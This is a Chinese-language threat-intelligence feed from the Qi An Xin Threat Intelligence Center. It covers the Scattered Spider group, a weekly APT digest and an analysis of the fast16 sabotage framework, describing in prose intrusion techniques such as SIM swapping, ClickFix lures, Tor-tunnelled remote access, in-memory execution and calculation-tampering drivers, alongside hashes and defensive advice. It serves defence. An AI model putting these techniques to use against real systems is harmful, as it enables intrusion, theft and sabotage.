分析发现，Scattered Spider的攻击能力经历了明显演进轨迹。

起源：0ktapus钓鱼攻击（2022年）

该组织最初以"0ktapus"名称活动，主要针对多因素认证（MFA）服务商发起钓鱼攻击。通过克隆Okta登录页面，该组织窃取了大量企业员工的SSO凭证。这一阶段的攻击手法相对简单，以大规模钓鱼为主。

成熟期：多向量社工攻击（2022-2023年）

随着攻击经验积累，Scattered Spider开始采用更复杂的社会工程策略：

MFA轰炸（MFA Fatigue）：向受害者重复发送多因素认证请求，直至其不堪骚扰而批准
语音钓鱼（Vishing）：冒充IT支持人员通过电话获取访问权限
SIM交换攻击：成为绕过强认证的标准手段

协同阶段：与勒索软件组织合流（2023年至今）

奇安信威胁情报中心监测发现，Scattered Spider与多个勒索软件组织存在合作关系，包括BlackCat/AlphV、Qilin和RansomHub等。这表明该组织已从单纯的数据窃取转向更深层次的入侵服务，为勒索软件攻击提供初始访问通道。

这种协同模式的典型案例包括：

提供被盗凭证和内网访问权限
协助完成横向移动和数据外泄
参与赎金谈判过程

地缘关联与"The Com"网络犯罪生态

Scattered Spider作为"The Com"网络犯罪社区的成员，其活动模式反映了这一地下生态的运作特征。

"The Com"概述

"The Com"是一个以英语为主的地下社区，成员通过特定论坛和即时通讯平台进行联络。该社区具有以下特征：

成员年龄普遍较低，强调"年轻黑客"身份认同
采用社工攻击作为主要突破手段
重视信息共享和攻击工具流通
与传统东欧网络犯罪组织存在明显区别

与传统网络犯罪的差异

特征	Scattered Spider/"The Com"	传统东欧网络犯罪组织
成员语言	英语母语	俄语为主
组织结构	松散社区型	层级分明帮派型
攻击偏好	社工、钓鱼、SIM交换	勒索软件、漏洞利用
目标选择	科技、加密货币	金融、医疗
基础设施	Telegram、云服务	传统服务器、Tor

执法挑战

Buchanan在西班牙被捕的案例凸显了追踪英语母语网络犯罪分子的复杂性。与东欧犯罪分子通常在俄罗斯等地建立安全庇护所不同，"The Com"成员分布广泛，增加了国际执法协调的难度。然而，美国与西班牙、英国的执法合作最终成功实现引渡，显示了跨国司法协作的有效性。

国内关联影响与风险预警

尽管Scattered Spider的主要目标为欧美企业，但国内企业和机构也应高度重视以下风险：

直接风险

跨国科技企业影响：在华的跨国科技公司（特别是涉及云通信、BPO服务的厂商）可能成为Scattered Spider的攻击跳板
加密货币交易所用户：使用短信验证码认证的国内加密货币用户面临SIM交换攻击风险
远程办公基础设施：使用VPN和SSO的企业员工凭证对攻击者具有高价值

间接风险

工具扩散：Scattered Spider使用的钓鱼工具包和Telegram数据通道模式可能被国内威胁行为体模仿
协作网络延伸：随着该组织与勒索软件组织的关系深化，针对国内企业的勒索攻击可能通过类似模式发起

防护建议

奇安信安全专家建议企业采取以下措施应对此类威胁：

技术层面：

禁用基于短信的双因素认证，改用硬件令牌或认证器应用
对VPN和SSO登录实施设备绑定和地理限制
部署邮件/短信钓鱼检测系统，对可疑链接进行实时阻断
建立MFA异常行为监控，识别非工作时间或异常设备的认证请求

管理层面：

定期进行社工防范培训，特别是针对钓鱼和SIM交换攻击
建立SIM卡安全策略，要求员工为其手机号码启用运营商保护
完善加密货币钱包管理规范，使用硬件钱包存储大额资产
定期审计第三方服务商的安全状况，特别是云通信提供商

监控层面：

部署威胁情报平台，追踪与"The Com"相关的攻击活动
建立Telegram频道和地下论坛监控机制
对员工个人信息泄露进行持续监测

结论与后续跟踪

Tyler Buchanan的认罪标志着Scattered Spider组织面临的重大打击，但考虑到该组织成员的年轻化特征和社区化运作模式，其活动不会因此终止。奇安信威胁情报中心将持续跟踪该组织的后续发展，重点关注：

Buchanan的量刑结果及其可能的协助执法行动
其余三名被告的审判进展
Scattered Spider组织的战术调整和能力演进
与勒索软件组织的协作深化程度

国内企业和机构应以此案为契机，全面审视自身安全防护体系中对社工攻击和SIM交换攻击的抵御能力，特别是在多因素认证和移动设备安全领域。

技术附录：相关MITRE ATT&CK技术映射

技术ID	技术名称	Scattered Spider使用情况
T1566	网络钓鱼	短信钓鱼、钓鱼工具包
T1566.002	鱼叉式钓鱼链接	定制化钓鱼内容
T1649	盗窃或伪造身份证明文件	SIM交换攻击
T1078.004	有效账户：云账户	使用窃取凭证访问企业系统
T1098	账户操作	利用窃取的PII进行账户恢复
T1556.002	修改认证流程：密码哈希同步	尝试同步认证令牌
T1071.001	应用层协议：Web协议	C2通信、Telegram数据通道

参考来源

[1].https://www.securityweek.com/british-scattered-spider-hacker-pleads-guilty-in-the-us/

点击阅读原文至ALPHA 9.1

即刻助力威胁研判

阅读原文

跳转微信打开

每周高级威胁情报解读(2026.04.17~04.23)

Fri, 24 Apr 2026 11:56:00 +0800

威胁情报中心 2026-04-24 11:56 北京

Lazarus 从 Kelp DAO 窃取了 2.9 亿美元；SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证；疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析

2026.04.17~04.23

攻击团伙情报

Lazarus 从 Kelp DAO 窃取了 2.9 亿美元
SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证
疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析
Void Dokkaebi 利用受感染的开发者代码库作为恶意软件传播渠道
Lazarus 使用“Mach-O Man”macOS 恶意软件工具包攻击企业
Harvester组织利用新的 GoGra Linux 后门扩展工具集

攻击行动或事件情报

攻击者会冒充 IT 或技术支持人员实施数据窃取
攻击者利用macOS原生功能实现“离地”攻击
伪装成TikTok视频下载器的扩展程序窃取13万用户数据
又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告
PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行

恶意代码情报

Gentlemen 勒索软件与SystemBC：代理背后的秘密
新的 NGate 变种隐藏在合法安卓应用程序中
Lotus Wiper：针对能源和公用事业领域的新威胁
研究人员发现 DinDoor 后门 20 台活跃的 C2 服务器

漏洞情报

Oracle 2026年4月补丁日多产品高危漏洞安全风险通告
Claude Mythos AI 模型发现 Firefox 中存在 271 个零日漏洞

攻击团伙情报

Lazarus 从 Kelp DAO 窃取了 2.9 亿美元

披露时间：2026年4月20日

情报来源：https://securityaffairs.com/191092/digital-id/north-koreas-lazarus-apt-stole-290m-from-kelp-dao.html

相关信息：

攻击者通过入侵LayerZero依赖的RPC节点并操纵验证层，对Kelp DAO发起攻击，利用其不安全的单点验证器配置绕过检查，盗取资金后Kelp DAO冻结合约并阻止了第二次约9500万美元的窃取尝试；LayerZero确认攻击仅影响rsETH配置，归因于Lazarus Group，并指出行业标准要求多验证器设置可避免此漏洞，但Kelp DAO未采纳，导致影响扩散至Aave等DeFi协议。

SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证

披露时间：2026年4月20日

情报来源：https://intel.breakglass.tech/post/sidewinder-z2fa-lts-moincox-bangladesh-navy-pakistan-mofa-opsec-burn

相关信息：

SideWinder APT组织自2026年2月起针对南亚政府机构（包括孟加拉国海军、巴基斯坦外交部等）发起高度定向的钓鱼攻击，使用伪造的Chrome PDF查看器和像素级精确的Zimbra邮件登录克隆页面（内部项目名Z2FA_LTS）窃取凭证；攻击链始于伪造的巴基斯坦外交电报诱饵，通过模糊PDF、Zimbra加载页和反向代理真实资产实现，一次开发者的操作安全失误导致服务器返回堆栈跟踪，暴露了Linux用户名moincox及项目名，多个独立研究员确认该活动归属SideWinder。

疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析

披露时间：2026年4月21日

情报来源：https://mp.weixin.qq.com/s/nJpqvXCYV3ZdvNgYGrG4ow

相关信息：

近期360高级威胁研究院捕获APT-C-13（Sandworm）组织利用SSH与TOR嵌套隧道技术实施定向攻击的多个恶意样本。根据分析，APT-C-13组织通过鱼叉邮件投递携带恶意LNK文件的ZIP压缩包，诱骗用户执行后，LNK文件会在用户配置文件目录及其子文件夹中递归搜索诱饵压缩包并多层解压至指定位置，随后运行主控脚本创建SSH与TOR两个计划任务以构建复杂通信链路。其中TOR任务利用HiddenServicePort特性将受害机本地关键服务端口（如SMB/445、RDP/3389）映射至Onion匿名域名，使攻击者无需穿透入站防火墙即可通过Tor节点全球直连内网；同时SSH任务在Tor隧道内部署轻量化SSH服务端，通过PubkeyAuthentication公钥认证和自定义Subsystem子系统配置，形成兼具强加密性与权限控制的隐蔽远程管理通道，有效规避传统流量审计。

Void Dokkaebi 利用受感染的开发者代码库作为恶意软件传播渠道

披露时间：2026年4月21日

情报来源：https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html

相关信息：

Void Dokkaebi（又名Famous Chollima）已从单目标社会工程学攻击演变为一种自我传播的供应链威胁，通过恶意VS Code任务和代码注入在开发者生态中实现蠕虫式传播。2026年3月的分析发现超过750个感染仓库、500多个恶意VS Code任务配置及101个提交篡改工具实例，该攻击利用Tron、Aptos和币安智能链等区块链基础设施托管载荷，即使开发者被入侵后，其代码贡献也会成为下游受害者的感染源。

Lazarus 使用“Mach-O Man”macOS 恶意软件工具包攻击企业

披露时间：2026年4月21日

情报来源：https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/

相关信息：

Lazarus组织正在利用伪造的会议邀请链接，针对使用macOS系统的金融科技、加密货币等高价值环境发起ClickFix攻击，攻击者通过Telegram发送看似正常的会议邀请，诱导用户访问虚假的Zoom或Teams页面，并以“修复连接问题”为由诱骗用户手动在终端中复制执行恶意命令，从而部署名为“Mach-O Man”的新型恶意软件工具包；该工具包由多个Go语言编写的Mach-O二进制文件组成，依次执行系统指纹收集、持久化安装以及最终的信息窃取，窃取的数据包括浏览器凭证、Cookie和macOS钥匙串等敏感信息，并通过Telegram作为外传通道；整个攻击过程依赖于用户交互，能够绕过传统安全检测，给企业带来账户接管、财务损失和数据泄露等严重风险。

Harvester组织利用新的 GoGra Linux 后门扩展工具集

披露时间：2026年4月22日

情报来源：https://www.security.com/threat-intelligence/harvester-new-linux-backdoor-gogra

相关信息：

Harvester APT组织开发了新型Linux版GoGra后门，该恶意软件利用Microsoft Graph API和Outlook邮箱作为隐蔽命令控制通道，通过伪装成PDF等诱饵文档的ELF文件传播，并设置系统自启动持久化；后门轮询特定邮箱文件夹中标题以“Input”开头的邮件，解密并执行命令后将结果以“Output”主题邮件回传，该Linux版本与Windows版本代码高度相似，目标主要针对印度和阿富汗地区。

攻击行动或事件情报

攻击者会冒充 IT 或技术支持人员实施数据窃取

披露时间：2026年4月18日

情报来源：https://www.microsoft.com/en-us/security/blog/2026/04/18/crosstenant-helpdesk-impersonation-data-exfiltration-human-operated-intrusion-playbook/

相关信息：

攻击者通过跨租户Microsoft Teams冒充IT或服务台人员，利用社会工程学诱骗用户授予远程桌面访问权限（如Quick Assist），随后借助合法签名的应用程序进行DLL侧载、通过注册表加载恶意载荷、使用WinRM进行基于凭证的横向移动，并部署Rclone等工具将敏感数据外传至云存储，整个过程依赖合法工具和管理协议以融入正常企业活动。

攻击者利用macOS原生功能实现“离地”攻击

披露时间：2026年4月21日

情报来源：https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/

相关信息：

研究人员揭示了攻击者如何利用macOS原生功能实现“离地”攻击，通过远程应用脚本和Apple事件绕过安全控制进行远程命令执行与横向移动，滥用Spotlight元数据中的Finder注释字段来隐藏和投递载荷，并利用SMB、Netcat、Git、TFTP及SNMP等内置协议在完全脱离SSH监控的情况下进行工具包传输和持久化；为应对此类威胁，防御者需从静态文件扫描转向进程链、进程间通信异常监控，并通过MDM策略禁用不必要的管理服务。

伪装成TikTok视频下载器的扩展程序窃取13万用户数据

披露时间：2026年4月20日

情报来源：https://layerxsecurity.com/blog/stealtok-130k-users-compromised-by-data-stealing-tiktok-video-downloaders/

相关信息：

一项大规模恶意浏览器扩展活动被发现，该活动涉及至少12个伪装成TikTok视频下载器的扩展程序，它们共享同一代码库并长期在Chrome和Edge商店中运营，这些扩展通过远程配置机制实现延迟6至12个月后才引入恶意功能，从而绕过商店审查，它们收集包括电池状态在内的高熵设备指纹数据，已影响超过13万用户，且许多扩展曾获得“精选”徽章以增加可信度，即使部分被移除，攻击者也能迅速克隆并重新发布，形成持续的运营模式。

又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告

披露时间：2026年4月23日

情报来源：https://blog.talosintelligence.com/the-n8n-n8mare/

相关信息：

广受欢迎的Python AI推理包xinference在PyPI上被上传了三个恶意版本，当开发者导入该包时，混淆代码会自动执行，窃取云凭据、SSH密钥、K8s配置、API令牌、加密货币钱包等敏感数据并压缩发送至C2服务器；该包总下载量约68万次，恶意版本已被撤回，安全版本为2.5.0；代码中包含“hacked by teampcp”标记，但TeamPCP公开否认参与，暗示可能是模仿攻击，受影响用户应立即隔离环境、轮换所有凭据并降级至安全版本。

PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行

披露时间：2026年4月17日

情报来源：https://www.cyfirma.com/research/operation-phantomclr-stealth-execution-via-appdomain-hijacking-and-in-memory-net-abuse/

相关信息：

研究人员深入分析了一个APT级别的后渗透框架，攻击者利用合法的Intel签名二进制文件IAStorHelp.exe，通过AppDomainManager劫持机制执行恶意代码，实现可信执行路径的滥用；整个攻击链始于钓鱼邮件中的ZIP附件，包含LNK诱饵、恶意配置文件、加密载荷及诱饵PDF，通过60秒素数计算和AES-128-CBC密钥推导循环（约41,410次迭代）实现沙箱逃逸，利用JIT trampoline技术在不调用VirtualAlloc等常规API的情况下执行shellcode，并通过反射式DLL加载和PEB遍历实现内存中的隐蔽执行；命令控制通信通过Amazon CloudFront CDN进行域前置，流量伪装成合法云服务，同时采用DLL注入风暴、堆遍历恢复、两阶段内存反取证清理及插件化架构增强韧性和隐蔽性；该框架主要针对中东和EMEA金融部门，其规避能力、模块化设计及对信任关系的滥用标志着攻击者已具备极高的操作成熟度，远超普通恶意软件。

恶意代码情报

Gentlemen 勒索软件与SystemBC：代理背后的秘密

披露时间：2026年4月20日

情报来源：https://research.checkpoint.com/2026/dfir-report-the-gentlemen/

相关信息：

The Gentlemen勒索软件即服务自2025年中出现，2026年已公开超320名受害者，通过90/10的高额分成吸引附属攻击者，使用Go编写的多平台勒索软件（Windows、Linux、ESXi）和C语言编写的ESXi变体，攻击者利用SystemBC代理、Cobalt Strike等工具，通过域控权限、GPO批量部署、禁用Windows Defender、删除卷影副本和日志、使用XChaCha20与X25519加密文件，ESXi变体可关闭虚拟机并创建持久化机制，Check Point Research通过访问实时C2服务器发现其实际控制超过1570个企业受害者，远超公开数字。

新的 NGate 变种隐藏在合法安卓应用程序中

披露时间：2026年4月21日

情报来源：https://www.welivesecurity.com/en/eset-research/new-ngate-variant-hides-in-a-trojanized-nfc-payment-app/

相关信息：

ESET研究人员发现了一个新型NGate恶意软件变种，该变种滥用合法Android应用HandyPay，攻击者利用AI生成代码对其进行了木马化，通过伪造巴西彩票网站和假Google Play页面诱导用户安装，一旦安装，恶意代码能够中继受害者支付卡的NFC数据并窃取PIN码，使攻击者能够进行非接触式ATM取款和未经授权的支付，该活动自2025年11月起持续针对巴西Android用户。

Lotus Wiper：针对能源和公用事业领域的新威胁

披露时间：2026年4月21日

情报来源：https://securelist.com/tr/lotus-wiper/119472/

相关信息：

在针对委内瑞拉能源和公用事业部门的破坏性攻击中，攻击者使用两个批处理脚本启动攻击链，通过检查远程XML文件作为网络触发信号，禁用系统服务、修改用户密码、关闭网络接口、利用diskpart和robocopy等工具覆盖磁盘内容，最终解密并执行名为Lotus Wiper的擦除器；该擦除器删除系统还原点、向所有物理磁盘扇区写入零数据、清除更新序列号日志并强制删除所有文件，使系统无法恢复。

研究人员发现 DinDoor 后门 20 台活跃的 C2 服务器

披露时间：2026年4月21日

情报来源：https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis

相关信息：

DinDoor是一种利用Deno运行时执行恶意JavaScript的后门，通过MSI文件交付，绕过了仅监控PowerShell或Node.js的环境；两个分析样本均使用相同的指纹算法生成唯一受害者ID，但一个样本将JWT令牌嵌入C2 URL中暴露了与MuddyWater关联的战役信息，另一个样本则将载荷直接传入内存执行而不落地；C2服务器的HTTP响应具有一致的“Via: 1.1 Caddy”头特征，可据此识别出20个活跃的C2节点；建议组织监控deno.exe的异常执行、限制MSI运行、阻止相关域名和Caddy特征流量。

漏洞情报

Oracle 2026年4月补丁日多产品高危漏洞安全风险通告

披露时间：2026年4月22日

情报来源：https://mp.weixin.qq.com/s/yawZXSHEaVPOGELMEQmOxA

相关信息：

Oracle官方发布了2026年4月的关键安全补丁集合更新CPU（Critical Patch Update），修复了多个漏洞包括 CVE-2026-34305、CVE-2026-34315、CVE-2026-34270 等。其中Oracle WebLogic Server信息泄露漏洞(CVE-2026-34305)、Oracle MySQL Shell Core Client信息泄露漏洞(CVE-2026-34318)影响相对较大。奇安信CERT建议客户尽快自查并应用本次关键安全补丁集合（CPU）。

Claude Mythos AI 模型发现 Firefox 中存在 271 个零日漏洞

披露时间：2026年4月22日

情报来源：https://cybersecuritynews.com/claude-mythos-271-zero-days/

相关信息：

Anthropic的Claude Mythos预览版模型在与Mozilla Firefox的合作中，单次评估发现了271个零日漏洞，全部在Firefox 150中修复，这是浏览器历史上最大规模的安全更新；此前Claude Opus 4.6已发现22个漏洞，而Mythos展现了自主发现和利用漏洞的能力，并在OpenBSD、FFmpeg等基础设施中找到了埋藏数十年的古老缺陷，标志着AI驱动的漏洞发现正扭转攻防不对等的局面。

点击阅读原文至ALPHA 9.1

即刻助力威胁研判

阅读原文

跳转微信打开

追踪史上首个国家级高精度计算破坏框架——"fast16"深度报告

Fri, 24 Apr 2026 11:56:00 +0800

原创威胁情报中心 2026-04-24 11:56 北京

SentinelLABS披露了可追溯至2005年的国家级网络破坏框架fast16，其设计理念与技术架构远超同时代恶意软件至少五年。该框架专门针对超高精度计算软件实施破坏活动，代表了国家级网络攻击能力的早期实践，比震惊全球的Stuxnet（震网病毒）事件至少早五年出现。

背景概述

奇安信威胁情报中心在持续追踪境外高级持续性威胁（APT）组织活动过程中注意到，SentinelLABS披露了一起具有里程碑意义的发现：一个可追溯至2005年的国家级网络破坏框架fast16，其设计理念与技术架构远超同时代恶意软件至少五年。该框架专门针对超高精度计算软件实施破坏活动，代表了国家级网络攻击能力的早期实践，比震惊全球的Stuxnet（震网病毒）事件至少早五年出现。

这一发现对理解APT攻击演进路径具有重要价值。fast16所展现的模块化设计思维、嵌入式脚本引擎应用、以及针对关键计算基础设施的定向破坏模式，在后续十余年间的多起APT攻击事件中均可看到其影子。对于国内关键信息基础设施防护而言，深入剖析这类早期高级攻击框架的技术特征，对于识别和防御同类威胁具有重要的现实意义。

技术架构分析

载体模块：svcmgmt.exe

fast16框架的核心载体为svcmgmt.exe，该二进制文件呈现出典型的高阶国家级攻击工具特征。文件编译时间为2005年8月30日，大小为315,392字节，PE头部标识为Windows 2000/XP时代的控制台模式服务包装器。

该载体的技术架构极具前瞻性。攻击者在svcmgmt.exe中嵌入了完整的Lua 5.0虚拟机，这一设计在2005年尚属首创，比已知最早采用相同架构的Flame攻击平台提前三年。Lua引擎的引入使得攻击者能够在不重新编译整个植入体的情况下，动态加载和更新功能模块，这一理念与现代APT攻击的模块化设计完全一致。

载体内部对Lua环境进行了深度定制扩展：

扩展模块	功能描述
wstring模块	原生Unicode字符串处理能力
内置对称加密器	解密嵌入的加密数据载荷
Windows NT绑定模块	直接调用文件系统、注册表、服务控制、网络API

载体采用三种运行模式，通过命令行参数切换：直接运行启动Windows服务；-i参数安装服务并执行Lua代码；-r参数直接执行Lua代码；其他参数则进入代理/包装模式。这种灵活的设计使同一二进制文件能够适应多种作战环境。

载体内部存储三个独立有效载荷：加密Lua字节码（负责配置和协调逻辑）、辅助DLL模块（ConnotifyDLL）、以及内核驱动文件（fast16.sys）。这种分离式架构实现了"稳定外壳+动态载荷"的设计目标，允许攻击者在不更换载体的情况下更新攻击能力。

内核驱动程序：fast16.sys

fast16.sys是该破坏框架的核心恶意组件，编译时间为2005年7月19日，文件大小44,580字节。作为启动型（boot-start）文件系统驱动，该模块在存储栈中占据关键位置，能够拦截和修改从磁盘读取的可执行代码。

该驱动的技术实现具有开创性意义。它并非简单的文件感染或注册表持久化工具，而是实现了基于规则的代码修补功能。具体而言，fast16.sys会在高精度计算软件运行时拦截其代码执行流，在内存中注入修改后的指令，导致计算结果出现系统性偏差。这种攻击方式精度极高，能够在神不知鬼不觉的情况下持续输出错误结果，适用于需要长期潜伏且不易被察觉的破坏性任务。

该驱动在2005年针对当时主流的Windows版本设计，无法在Windows 7及更高版本系统运行。尽管如此，其设计理念——通过内核级文件系统过滤实现代码篡改——代表了当时顶级网络攻击能力的巅峰。

蠕虫传播机制

fast16框架集成了自我传播能力，是已知最早的Lua-based网络蠕虫。载体模块设计为可携带多个"蠕虫模块"（内部代号"wormlets"），本次发现的样本中包含一个服务控制管理器（SCM）蠕虫模块。

蠕虫传播流程如下：首先读取配置信息，确定载荷路径、服务配置和目标IP范围；将配置值转换为宽字符字符串以适配C层调用；提权后将载体安装为名为"SvcMgmt"的Windows服务并启动；根据配置决定是否部署内核驱动fast16.sys；最后释放蠕虫模块进行横向扩散。

该传播机制与同时代的大规模网络蠕虫（如SQL Slammer、Blaster等）形成鲜明对比。后者追求快速扩散，往往携带无意义的破坏载荷；而fast16的蠕虫模块专门针对特定目标环境设计，体现出国级攻击行动的精准性和克制性。

规避与反检测机制

fast16展现出对目标环境的高度警觉性。载体内建终止开关机制（Kill Switch），能够检测安全产品的运行特征，在识别到受监控环境时拒绝部署。这种设计确保攻击行动不会暴露于安全研究人员的分析环境中，最大程度保护行动的安全性。

结合ShadowBrokers泄露文件中的信息，fast16还内置了去冲突签名机制。NSA操作人员通过"Territorial Dispute"组件对已知植入物进行标记，避免与其他国家级攻击行动产生冲突。这一设计揭示了网络空间中国家间攻防博弈的隐秘一角——多个国家级黑客团队在同一目标网络中活动，需要相互识别和规避。

ShadowBrokers关联与技术溯源

泄露事件回溯

2017年4月，名为ShadowBrokers的黑客组织公开泄露了据称来自美国国家安全局（NSA）的网络攻击工具库。其中一份关键文件drv_list.txt引起了安全研究人员的注意——这是一份约250KB的驱动程序名称列表，用于标记NSA植入物为"友好"或需要"撤回"，以避免与竞争对手的国级攻击行动冲突。

在这份列表中，"fast16"赫然在列，对应的规避指令为：

"fast16 Nothing to see here – carry on "

这一指令的含义明确：当操作人员发现目标系统存在名为fast16的驱动程序时，应将其视为己方植入物并绕过，而非触发反制措施。这直接证实了NSA曾使用该工具进行过实际网络攻击行动。

取证链路确认

本次分析的关键突破在于SentinelLABS在svcmgmt.exe二进制文件中发现的PDB路径字符串：

C:\buildy\driver\fd\i386\fast16.pdb

这一看似普通的编译产物路径，实际上揭示了fast16.sys与svcmgmt.exe之间的内在联系。该路径指向一个内核驱动项目，其命名与NSA泄露文件中的"fast16"完全吻合。通过这条取证链路，我们将2017年的泄露事件与2005年编译的恶意软件样本建立了直接关联，证实了NSA在2005年即已掌握并部署了该破坏框架。

APT组织归因与战术演进分析

嵌入式Lua VM战术的传承

观察到一个显著的技术特征是：多个顶级APT组织均采用嵌入式Lua虚拟机作为恶意软件框架的核心组件。

经过系统梳理，采用相同架构的APT组织和恶意软件家族包括：

APT组织/恶意软件	首次发现时间	Lua VM应用特点
fast16	2005年	载体模块嵌入Lua 5.0，支持动态载荷加载
Flame	2012年	模块化Lua引擎，支持加密指令下发
PlexingEagle	约2012年	与Flame相关联的恶意组件
Animal Farm - Bunny	约2012-2014年	轻量化Lua脚本执行环境
Project Sauron	2015年	基于Lua VM的可扩展攻击平台

这一现象并非巧合。Lua语言作为轻量级嵌入式脚本引擎，与C/C++具有天然的亲和性，能够无缝扩展已感染系统上的恶意功能，同时避免重新编译整个植入体。对于追求长期潜伏和动态能力更新的国级攻击团队而言，这种架构设计具有显著的战略价值。

技术传承分析：虽然目前尚未发现直接代码共享的证据，但多个独立APT组织不约而同地采用Lua VM架构，表明这一开发范式在顶级网络攻击领域已形成某种"技术共识"。fast16作为该架构的最早实践者，对后续Flame、Sauron等攻击平台的发展具有重要的先导意义。

从破坏性攻击到持久化潜伏

fast16的攻击模式代表了国级网络攻击的早期形态：直接、精准、定向破坏。针对高精度计算软件的代码篡改攻击能够在不引起注意的情况下持续输出错误结果，适用于对核研究、密码学运算等关键领域的长期干扰。

随着时间推移，同类APT组织的攻击战术呈现演进趋势。Stuxnet（2010年）代表了破坏性攻击的巅峰，但同时也招致了国际社会的强烈关注。此后的APT攻击逐渐转向持久化潜伏+情报窃取模式，攻击者更倾向于长期隐蔽在目标网络中收集情报，而非实施直接破坏。这种战术转型与攻击者对曝光风险的敏感度提升密切相关。

对于国内关键信息基础设施而言，这一演进趋势意味着防御策略需要兼顾传统破坏性攻击和新型持久化渗透两种威胁形态。

对国内关键基础设施的影响评估

高精度计算领域的潜在风险

fast16的技术目标——高精度计算软件——涵盖了先进物理模拟、密码学运算、核研究等国家级关键工作负载。这些领域在国内主要分布于：

科研机构：高校和国家实验室的高性能计算集群
核能行业：核电站设计模拟和燃料循环计算系统
密码学研究：金融和军事领域的加密算法开发
加密货币：虽然原文提及，但该领域在国内规模相对有限

尽管fast16编译于2005年，无法直接运行于现代系统，但其揭示的代码篡改攻击范式对当前安全防御仍具警示意义。任何针对高精度计算软件供应链的攻击——无论是开发工具污染、代码仓库篡改还是运行时注入——都可能产生与fast16类似的破坏效果。

供应链安全启示

fast16的模块化架构和动态载荷设计，揭示了供应链攻陷的巨大威力。攻击者只需要在软件供应链的某一环节植入初始载体，即可在目标网络中持续获得执行能力，并通过Lua脚本的动态更新实现功能迭代。这种攻击模式对传统的基于特征码的防御机制构成严峻挑战。

奇安信威胁情报中心建议，关键信息基础设施运营者应当：

加强供应链透明度：对引入的第三方软件和组件进行严格的代码审计和完整性验证
实施可信计算：部署基于硬件的信任根，确保系统启动链的完整性
监控计算结果异常：针对高精度计算场景建立基准输出库，及时发现系统性偏差
关注内核驱动安全：对加载的内核驱动进行签名验证，防止恶意驱动的部署

失陷指标（IOC）

核心文件哈希

文件名	MD5	SHA256
svcmgmt.exe	dbe51eabebf9d4ef9581ef99844a2944	9a10e1faa86a5d39417cae44da5adf38824dfb9a16432e34df766aa1dc9e3525
fast16.sys	0ff6abe0252d4f37a196a1231fae5f26	07c69fc33271cf5a2ce03ac1fed7a3b16357aec093c5bf9ef61fbfa4348d0529

完整IOC列表

MD5哈希：

dbe51eabebf9d4ef9581ef99844a2944
0ff6abe0252d4f37a196a1231fae5f26
410eddfc19de44249897986ecc8ac449
1d2f32c57ae2f2013f513d342925e972
af4461a149bfd2ba566f2abefe7dcde4

49a8934ccd34e2aaae6ea1e6a6313ffe
e0c10106626711f287ff91c0d6314407
2717b58246237b35d44ef2e49712d3a2
daea40562458fc7ae1adb812137d3d05
2740a703859cbd8b43425d4a2cacb5ec
ebff5b7d4c5becb8715009df596c5a91
cb66a4d52a30bfcd980fe50e7e3f73f0
075b4aa105e728f2b659723e3f36c72c
cf859f164870d113608a843e4a9600ab
f4dbbb78979c1ee8a1523c77065e18a5

SHA1哈希：

de584703c78a60a56028f9834086facd1401b355
92e9dcaf7249110047ef121b7586c81d4b8cb4e5
675cb83cec5f25ebbe8d9f90dea3d836fcb1c234
2fa28ef1c6744bdc2021abd4048eefc777dccf22
586edef41c3b3fba87bf0f0346c7e402f86fc11e
3ce5b358c2ddd116ac9582efbb38354809999cb5
650fc6b3e4f62ecdc1ec5728f36bb46ba0f74d05
d475ace24b9aedbf431efc68f9db32d5ae761bd
1ce1111702b765f5c4d09315ff1f0d914f7e5c70
ca665b59bc590292f94c23e04fa458f90d7b20c9
829f8be65dfe159d2b0dc7ee7a61a017acb54b7b
e6018cd482c012de8b69c64dc3165337bc121b86
145ef372c3e9c352eaaa53bb0893749163e49892
952ed694b60c34ba12df9d392269eae3a4f11be4
9e089a733fb2740c0e408b2a25d8f5a451584cf6

检测规则

规则名称	用途
apt_fast16_carrier	检测fast16载体模块
apt_fast16_driver	检测fast16内核驱动
apt_fast16_patch	检测代码修补行为
clean_fast16_patchtarget	辅助规则

MITRE ATT&CK技战术映射

根据MITRE ATT&CK框架，fast16框架涉及以下技战术：

战术类别	技术编号	技术名称
持久化	T1543.003	创建/修改Windows服务
持久化	T1547.001	引导执行或启动目录
权限提升	T1068	利用特权升级漏洞
防御规避	T1562.001	禁用安全工具
防御规避	T1027	混淆文件或信息
横向移动	T1210	利用远程服务漏洞
横向移动	T1021.002	SMB/Windows管理共享
影响	T1486	数据加密影响
影响	T0834	通过物理破坏或Manipulation损坏

结论与建议

fast16的发现为我们理解国家级网络攻击演进提供了宝贵的实物证据。该框架在2005年即已实现模块化设计、嵌入式Lua引擎、代码篡改攻击等高级能力，比同类技术的广泛应用提前至少五年。对于国内网络安全社区而言，这一发现的意义在于：

历史价值：证实了高级网络攻击能力的演进并非线性过程，而是存在多个并行发展的高峰。2005年的攻击者已具备制造针对关键计算基础设施破坏工具的能力。

战术预警：代码篡改攻击作为一种"静默破坏"手段，其威胁程度不亚于传统的勒索加密或数据外泄。国内高精度计算领域应建立相应的异常检测能力。

技术储备：fast16的Lua VM架构与后续多个APT组织的技术传承关系，为我们提供了追踪APT组织演化脉络的重要线索。奇安信威胁情报中心将持续监控相关技术特征在新一代恶意软件中的重现。

奇安信威胁情报中心呼吁，关键信息基础设施运营者应充分认识到供应链安全和代码完整性验证的重要性，建立覆盖开发、部署、运行全生命周期的安全管控机制。对于检测到相关特征的网络环境，应立即启动应急响应流程并与专业安全机构协作。

参考来源

